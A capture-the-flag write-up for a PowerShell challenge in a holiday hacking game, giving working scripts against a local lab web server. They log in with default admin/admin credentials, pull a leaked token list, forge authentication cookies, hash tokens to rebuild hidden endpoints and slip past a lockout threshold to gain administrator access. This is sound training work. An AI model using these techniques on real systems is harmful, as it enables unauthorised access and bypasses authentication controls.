PowerShell

Difficulty: ❄ ❄ ❄ ❄ ❄
Team Wombley is developing snow weapons in preparation for conflict, but they’ve been locked out by their own defenses. Help Piney with regaining access to the weapon operations terminal.

Hints

PowerShell Admin Access - Total Control

From:
I overheard some of the other elves talking. Even though the endpoints have been redacted, they are still operational. This means that you can probably elevate your access by communicating with them. I suggest working out the hashing scheme to reproduce the redacted endpoints. Luckily one of them is still active and can be tested against. Try hashing the token with SHA256 and see if you can reliably reproduce the endpoint. This might help, pipe the tokens to Get-FileHash -Algorithm SHA256.

PowerShell Admin Access - Fakeout EDR Threshold

From:
They also mentioned this lazy elf who programmed the security settings in the weapons terminal. He created a fakeout protocol that he dubbed Elf Detection and Response “EDR”. The whole system is literally that you set a threshold and after that many attempts, the response is passed through… I can’t believe it. He supposedly implemented it wrong so the threshold cookie is highly likely shared between endpoints!

Silver trophy

    1. There is a file in the current directory called ‘welcome.txt’. Read the contents of this file.

```powershell
Get-Content ./welcome.txt
```

```
System Overview
The Elf Weaponry Multi-Factor Authentication (MFA) system safeguards access to a classified armory containing elf weapons. This high-security system is equipped with advanced defense mechanisms, including canaries, retinal scanner and keystroke analyzing, to prevent unauthorized access. In the event of suspicious activity, the system automatically initiates a lockdown, restricting all access until manual override by authorized personnel.

Lockdown Protocols
When the system enters lockdown mode, all access to the armory is frozen. This includes both entry to and interaction with the weaponry storage. The defense mechanisms become active, deploying logical barriers to prohibit unauthorized access. During this state, users cannot disable the system without the intervention of an authorized administrator. The system logs all access attempts and alerts central command when lockdown is triggered.

Access and System Restoration
To restore access to the system, users must follow strict procedures. First, authorized personnel must identify the scrambled endpoint. Next, they must deactivate the defense mechanisms by entering the override code and presenting the required token. After verification, the system will resume standard operation, and access to weaponry is reactivated.
```
    1. Geez that sounds ominous, I’m sure we can get past the defense mechanisms.
       We should warm up our PowerShell skills.
       How many words are there in the file?

```powershell
Get-Content ./welcome.txt | Measure-Object -Word
```

```
Lines Words Characters Property
----- ----- ---------- --------
        180
```
    1. There is a server listening for incoming connections on this machine, that must be the weapons terminal. What port is it listening on?

```powershell
netstat -an
```

```
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:1225          0.0.0.0:*               LISTEN
tcp6       0      0 172.17.0.6:42026        52.179.73.57:443        ESTABLISHED
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node    Path
unix  2      [ ACC ]     STREAM     LISTENING     228127385 /tmp/dotnet-diagnostic-632-34546516-socket
unix  2      [ ACC ]     STREAM     LISTENING     228126347 /tmp/CoreFxPipe_PSHost.DB3A6E3C.632.None.pwsh
unix  2      [ ACC ]     STREAM     LISTENING     228069183 /tmp/tmux-1050/default
unix  3      [ ]         STREAM     CONNECTED     228069344
unix  3      [ ]         STREAM     CONNECTED     228070105 /tmp/tmux-1050/default
```
    1. You should enumerate that webserver. Communicate with the server using HTTP, what status code do you get?

```powershell
iwr http://localhost:1225
```

```
Invoke-WebRequest: Response status code does not indicate success: 401 (UNAUTHORIZED).
```
    1. It looks like defensive measures are in place, it is protected by basic authentication.
       Try authenticating with a standard admin username and password.

```powershell
Invoke-WebRequest http://127.0.0.1:1225 -Credential (New-Object PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))) -AllowUnencryptedAuthentication
```

```
                    ----------------------------------------------------
🪖 Elf MFA webserver🪖
⚔️ Grab your tokens for access to weaponry ⚔️
⚔️ Warning! Sensitive information on the server, protect a…
RawContent       : HTTP/1.1 200 OK
                   Server: Werkzeug/3.0.6
                   Server: Python/3.10.12
                   Date: Tue, 19 Nov 2024 10:35:53 GMT
                   Connection: close
                   Content-Type: text/html; charset=utf-8
                   Content-Length: 3475

                   <html>
                   <body>
                   <pre>
                   ---…
Headers          : {[Server, System.String[]], [Date, System.String[]], [Connection, System.String[]], [Content-Type, System.String[]]…}
Images           : {}
InputFields      : {}
Links            : {@{outerHTML=<a href="http://localhost:1225/endpoints/1">Endpoint 1</a>; tagName=A; href=http://localhost:1225/endpoints/1}, @{outerHTML=<a href="http://localhost:1225/endpoints/2">Endpoint 2</a>; tagName=A; href=http://localhost:1225/endpoints/2}, @{outerHTML=<a href="http://localhost:1225/endpoints/3">Endpoint 3</a>; tagName=A; href=http://localhost:1225/endpoints/3}, @{outerHTML=<a href="http://localhost:1225/endpoints/4">Endpoint 4</a>; tagName=A; href=http://localhost:1225/endpoints/4}…}
RawContentLength : 3475
RelationLink     : {}
```
    1. There are too many endpoints here.
       Use a loop to download the contents of each page. What page has 138 words?
       When you find it, communicate with the URL and print the contents to the terminal.

```powershell
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
# Collect every endpoint link from the landing page
$links = (iwr http://127.0.0.1:1225 -Credential $creds -AllowUnencryptedAuthentication).Links.Href
foreach ($url in $links) {
    # Count the words in each endpoint's response body
    $words = Invoke-WebRequest -Uri $url -Credential $creds -AllowUnencryptedAuthentication | Measure-Object -Word | select -expand Words
    if ($words -eq 138) {
        iwr $url -Credential $creds -AllowUnencryptedAuthentication | select -expand Content
    }
}
```

```
<html><head><title>MFA token scrambler</title></head><body><p>Yuletide cheer fills the air,<br>    A season of love, of care.<br>    The world is bright, full of light,<br>    As we celebrate this special night.<br>    The tree is trimmed, the stockings hung,<br>    Carols are sung, bells are rung.<br>    Families gather, friends unite,<br>    In the glow of the fire’s light.<br>    The air is filled with joy and peace,<br>    As worries and cares find release.<br>    Yuletide cheer, a gift so dear,<br>    Brings warmth and love to all near.<br>    May we carry it in our hearts,<br>    As the season ends, as it starts.<br>    Yuletide cheer, a time to share,<br>    The love, the joy, the care.<br>    May it guide us through the year,<br>    In every laugh, in every tear.<br>    Yuletide cheer, a beacon bright,<br>    Guides us through the winter night </p><p> Note to self, remember to remove temp csvfile at http://127.0.0.1:1225/token_overview.csv</p></body></html>
```
    1. There seems to be a csv file in the comments of that page.
       That could be valuable, read the contents of that csv-file!

```powershell
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
iwr http://127.0.0.1:1225/token_overview.csv -Credential $creds -AllowUnencryptedAuthentication | select -expand Content
```

```
010f2cc580f74521c86215b7374eead6,REDACTED
29860c67296d808bc6506175a8cbb422,REDACTED
7b7f6891b6b6ab46fe2e85651db8205f,REDACTED
45ffb41c4e458d08a8b08beeec2b4652,REDACTED
d0e6bfb6a4e6531a0c71225f0a3d908d,REDACTED
bd7efda0cb3c6d15dd896755003c635c,REDACTED
5be8911ced448dbb6f0bd5a24cc36935,REDACTED
1acbfea6a2dad66eb074b17459f8c5b6,REDACTED
0f262d0003bd696550744fd43cd5b520,REDACTED
8cac896f624576d825564bb30c7250eb,REDACTED
8ef6d2e12a58d7ec521a56f25e624b80,REDACTED
b4959370a4c484c10a1ecc53b1b56a7d,REDACTED
38bdd7748a70529e9beb04b95c09195d,REDACTED
8d4366f08c013f5c0c587b8508b48b15,REDACTED
67566692ca644ddf9c1344415972fba8,REDACTED
8fbf4152f89b7e309e89b9f7080c7230,REDACTED
936f4db24a290032c954073b3913f444,REDACTED
c44d8d6b03dcd4b6bf7cb53db4afdca6,REDACTED
cb722d0b55805cd6feffc22a9f68177d,REDACTED
724d494386f8ef9141da991926b14f9b,REDACTED
67c7aef0d5d3e97ad2488babd2f4c749,REDACTED
5f8dd236f862f4507835b0e418907ffc,4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C
# [*] SYSTEMLOG
# [*] Defence mechanisms activated, REDACTING endpoints, starting with sensitive endpoints
# [-] ERROR, memory corruption, not all endpoints have been REDACTED
# [*] Verification endpoint still active
# [*] http://127.0.0.1:1225/tokens/<sha256sum>
# [*] Contact system administrator to unlock panic mode
# [*] Site functionality at minimum to keep weapons active
```
    1. Luckily the defense mechanisms were faulty!
       There seems to be one api-endpoint that still isn’t redacted! Communicate with that endpoint!

```powershell
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
iwr http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -Credential $creds -AllowUnencryptedAuthentication | select -Expand Content
```

```
<h1>[!] ERROR: Missing Cookie 'token'</h1>
```
    1. It looks like it requires a cookie token, set the cookie and try again.

```powershell
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))

# The MD5 token from the csv row whose SHA256 endpoint was not redacted
$cookie = New-Object System.Net.Cookie
$cookie.Name = "token"
$cookie.Value = "5f8dd236f862f4507835b0e418907ffc"
$cookie.Domain = "127.0.0.1"
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$session.Cookies.Add($cookie)

iwr http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -Credential $creds -AllowUnencryptedAuthentication -WebSession $session | select -Expand Content
```

```
<h1>Cookie 'mfa_code', use it at <a href='1732013309.8054779'>/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C</a></h1>
```
    1. Sweet we got a MFA token! We might be able to get access to the system.
       Validate that token at the endpoint!
       This is the exact moment I had to use ChatGPT to write the code.

```powershell
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))

# One cookie container shared by both requests
$cookieContainer = New-Object System.Net.CookieContainer

# First cookie: the MD5 token, required by the /tokens/<sha256> endpoint
$cookie = New-Object System.Net.Cookie
$cookie.Name = "token"
$cookie.Value = "5f8dd236f862f4507835b0e418907ffc"
$cookie.Domain = "127.0.0.1"
$cookieContainer.Add($cookie)

$response = Invoke-WebRequest -Uri http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -WebSession (New-Object Microsoft.PowerShell.Commands.WebRequestSession -Property @{ Cookies = $cookieContainer }) -Credential $creds -AllowUnencryptedAuthentication
# Pull the MFA code out of the href attribute in the response
($response.Content -match "href='([^']+)'") | Out-Null
$mfaCode = $matches[1]

# Second cookie: the freshly issued MFA code, presented to /mfa_validate/<sha256>
$mfaCookie = New-Object System.Net.Cookie
$mfaCookie.Name = "mfa_token"
$mfaCookie.Value = "$mfaCode"
$mfaCookie.Domain = "127.0.0.1"
$cookieContainer.Add($mfaCookie)

$validateUrl = "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C"
Invoke-WebRequest -Uri $validateUrl -WebSession (New-Object Microsoft.PowerShell.Commands.WebRequestSession -Property @{ Cookies = $cookieContainer }) -Credential $creds -AllowUnencryptedAuthentication | select -Expand Content
```

```
<h1>[+] Success</h1><br><p>Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg==</p>
```
    1. That looks like base64! Decode it so we can get the final secret!

```powershell
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg=="))
```

```
Correct Token supplied, you are granted access to the snow cannon terminal. Here is your personal password for access: SnowLeopard2ReadyForAction
```
    1. Hurray! You have thwarted their defenses!
      Alabaster can now access their weaponry and put a stop to it.
      Once HHC grants your achievement, you can close this terminal.

Gold trophy

To obtain the gold trophy I followed the hints of PowerShell Admin Access - Total Control and I had to write a lot of code, ending up in an unreasonably long PowerShell script:

```powershell
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
# One cookie container for the whole run, so the server's "attempts" cookie (the faulty
# EDR threshold from the hint) is carried along from token to token instead of resetting
$cookieContainer = New-Object System.Net.CookieContainer

$response = iwr http://127.0.0.1:1225/token_overview.csv -Credential $creds -AllowUnencryptedAuthentication
$content_array = $response.Content -split "\n"

$cookie = New-Object System.Net.Cookie
$cookie.Name = "token"
$cookie.Value = "5f8dd236f862f4507835b0e418907ffc"
$cookie.Domain = "127.0.0.1"
$cookieContainer.Add($cookie)

foreach ($line in $content_array) {
    # Skip the SYSTEMLOG comments and the csv header; everything else is a token row
    if (-Not $line.StartsWith("#") -and -Not $line.StartsWith("file_MD5hash")) {
        $line = ($line -Split ",")[0]
        # Adding a cookie with the same name and domain replaces the previous token cookie
        $token_cookie = New-Object System.Net.Cookie
        $token_cookie.Name = "token"
        $token_cookie.Value = $line
        $token_cookie.Domain = "127.0.0.1"
        $cookieContainer.Add($token_cookie)
        $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession -Property @{ Cookies = $cookieContainer }

        # Reproduce the redacted endpoint: SHA256 of the token followed by a newline
        # (the same bytes `echo token | sha256sum` would hash)
        $string = "$line`n"
        $bytes = [System.Text.Encoding]::UTF8.GetBytes($string)
        $sha256 = [System.Security.Cryptography.SHA256]::Create()
        $hashBytes = $sha256.ComputeHash($bytes)
        $hashString = -join ($hashBytes | ForEach-Object { $_.ToString("x2") })

        $response = Invoke-WebRequest -Uri http://127.0.0.1:1225/tokens/$hashString -Credential $creds -AllowUnencryptedAuthentication -WebSession $session
        ($response.Content -match "href='([^']+)'") | Out-Null
        $mfaCode = $matches[1]

        $mfaCookie = New-Object System.Net.Cookie
        $mfaCookie.Name = "mfa_token"
        $mfaCookie.Value = "$mfaCode"
        $mfaCookie.Domain = "127.0.0.1"

        $cookieContainer.Add($mfaCookie)

        $validateUrl = "http://127.0.0.1:1225/mfa_validate/$hashString"
        $response = Invoke-WebRequest -Uri $validateUrl -WebSession $session -Credential $creds -AllowUnencryptedAuthentication
        # Only print responses that are not an error page
        if (-Not $response.Content.Contains("ERROR")) {
            echo "$response"
        }
    }
}
```

```
<h1>[*] Setting cookie attempts</h1>
<h1>[+] Success, defense mechanisms deactivated.</h1><br>Administrator Token supplied, You are able to control the production and deployment of the snow cannons. May the best elves win: WombleysProductionLineShallPrevail</p>
<h1>[+] Success</h1><br><p>Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg==</p>
<h1>[!] System currently in lock down</h1><br><h1>[!] Failure, token has expired. [*] Default timeout set to 2s for security reasons</h1>
```
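As an added check that is not part of the original writeup: a small parser for token_overview.csv (comment lines, header, then md5,sha256 rows) together with a test of the hashing scheme from the Total Control hint, run against the single row whose SHA256 was not redacted and trying both the bare token and the token with a trailing newline (the variant the gold script relies on). The second column header and the placeholder rows in the sample file are assumptions; the real pair is the one from the page.

```powershell
# Added example, not code from the original writeup: parse token_overview.csv the way
# the server lays it out and confirm the endpoint hashing scheme against the one row
# whose SHA256 survived redaction before trusting it for every other token.
function ConvertFrom-TokenOverview {
    param([Parameter(Mandatory)] [string] $CsvText)
    # Drop blank lines, the SYSTEMLOG comments and the header, then read the rest as csv.
    # The header starts with 'file_MD5hash' (the gold script skips it too); the column
    # names used here are assumptions, so they are supplied explicitly.
    $rows = $CsvText -split "\r?\n" |
        Where-Object { $_ -and -not $_.StartsWith('#') -and -not $_.StartsWith('file_MD5hash') }
    $rows | ConvertFrom-Csv -Header 'Token', 'EndpointSha256'
}

function Get-TokenEndpointHash {
    param([Parameter(Mandatory)] [string] $Token, [switch] $TrailingNewline)
    # Hash either the bare token or the token plus "\n" (what `echo token | sha256sum` sees)
    $text = if ($TrailingNewline) { "$Token`n" } else { $Token }
    $stream = [System.IO.MemoryStream]::new([System.Text.Encoding]::UTF8.GetBytes($text))
    try { (Get-FileHash -InputStream $stream -Algorithm SHA256).Hash } finally { $stream.Dispose() }
}

function Test-TokenHashScheme {
    param([Parameter(Mandatory)] [string] $Token, [Parameter(Mandatory)] [string] $ExpectedSha256)
    foreach ($withNewline in $false, $true) {
        $hash = Get-TokenEndpointHash -Token $Token -TrailingNewline:$withNewline
        # Case-insensitive: the csv lists uppercase hex, ToString("x2") style code gives lowercase
        if ($hash -ieq $ExpectedSha256) {
            return [pscustomobject]@{ Matches = $true; TrailingNewline = $withNewline; Hash = $hash }
        }
    }
    [pscustomobject]@{ Matches = $false; TrailingNewline = $null; Hash = $null }
}

# Constructed sample in the same shape as the server's file: the header and the first row are
# placeholders, the last data row is the real unredacted pair from the page.
$sample = @"
file_MD5hash,SHA256_endpoint
00000000000000000000000000000001,REDACTED
5f8dd236f862f4507835b0e418907ffc,4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C
# [*] SYSTEMLOG
# [*] Verification endpoint still active
"@

$unredacted = ConvertFrom-TokenOverview -CsvText $sample | Where-Object EndpointSha256 -ne 'REDACTED'
foreach ($row in $unredacted) {
    Test-TokenHashScheme -Token $row.Token -ExpectedSha256 $row.EndpointSha256 | Format-List
}
```

Running it reports which encoding reproduces the known endpoint, which is the check to make before looping over every token in the file.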

Just don’t

I will not even discuss how painful it has been to write the code for this challenge.